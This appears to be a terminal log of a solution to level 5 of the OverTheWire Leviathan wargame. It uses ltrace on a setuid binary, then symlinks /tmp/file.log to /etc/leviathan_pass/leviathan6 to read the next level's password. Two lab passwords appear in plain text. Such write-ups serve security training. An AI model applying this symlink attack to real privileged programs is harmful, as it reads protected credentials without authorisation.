┌──(ra6narok㉿kali)-[~]
└─$ sshpass -p 0dyxT7F4QD ssh leviathan5@leviathan.labs.overthewire.org -p 2223
                   _            _       _   _                 
                  | | _____   _(_) __ _| |_| |__   __ _ _ __  
                  | |/ _ \ \ / / |/ _` | __| '_ \ / _` | '_ \ 
                  | |  __/\ V /| | (_| | |_| | | | (_| | | | |
                  |_|\___| \_/ |_|\__,_|\__|_| |_|\__,_|_| |_|
                                                              

leviathan5@gibson:~$ whoami
leviathan5
leviathan5@gibson:~$ ls -la
total 36
drwxr-xr-x  2 root       root        4096 Jun 16 02:46 .
drwxr-xr-x 83 root       root        4096 Jun 16 02:48 ..
-rw-r--r--  1 root       root         220 Mar 31 08:41 .bash_logout
-rw-r--r--  1 root       root        3771 Mar 31 08:41 .bashrc
-r-sr-x---  1 leviathan6 leviathan5 15140 Jun 16 02:46 leviathan5
-rw-r--r--  1 root       root         807 Mar 31 08:41 .profile
leviathan5@gibson:~$ ./leviathan5
Cannot find /tmp/file.log
leviathan5@gibson:~$ ltrace ./leviathan5
__libc_start_main(0x804910d, 1, 0xffffd484, 0 <unfinished ...>
fopen("/tmp/file.log", "r")                                                                                                                        = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
)                                                                                                                  = 26
exit(-1 <no return ...>
+++ exited (status 255) +++
leviathan5@gibson:~$ touch /tmp/file.log ; echo hello > /tmp/file.log
leviathan5@gibson:~$ ltrace ./leviathan5
__libc_start_main(0x804910d, 1, 0xffffd484, 0 <unfinished ...>
fopen("/tmp/file.log", "r")                                                                                                                        = 0x804d1a0
fgetc(0x804d1a0)                                                                                                                                   = 'h'
feof(0x804d1a0)                                                                                                                                    = 0
putchar(104, 0x804a008, 0, 0)                                                                                                                      = 104
fgetc(0x804d1a0)                                                                                                                                   = 'e'
feof(0x804d1a0)                                                                                                                                    = 0
putchar(101, 0x804a008, 0, 0)                                                                                                                      = 101
fgetc(0x804d1a0)                                                                                                                                   = 'l'
feof(0x804d1a0)                                                                                                                                    = 0
putchar(108, 0x804a008, 0, 0)                                                                                                                      = 108
fgetc(0x804d1a0)                                                                                                                                   = 'l'
feof(0x804d1a0)                                                                                                                                    = 0
putchar(108, 0x804a008, 0, 0)                                                                                                                      = 108
fgetc(0x804d1a0)                                                                                                                                   = 'o'
feof(0x804d1a0)                                                                                                                                    = 0
putchar(111, 0x804a008, 0, 0)                                                                                                                      = 111
fgetc(0x804d1a0)                                                                                                                                   = '\n'
feof(0x804d1a0)                                                                                                                                    = 0
putchar(10, 0x804a008, 0, 0hello
)                                                                                                                       = 10
fgetc(0x804d1a0)                                                                                                                                   = '\377'
feof(0x804d1a0)                                                                                                                                    = 1
fclose(0x804d1a0)                                                                                                                                  = 0
getuid()                                                                                                                                           = 12005
setuid(12005)                                                                                                                                      = 0
unlink("/tmp/file.log")                                                                                                                            = 0
+++ exited (status 0) +++
leviathan5@gibson:~$ ./leviathan5
hello
leviathan5@gibson:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@gibson:~$ ./leviathan5
szo7HDB88w  <----------PASSWORD
leviathan5@gibson:~$ 
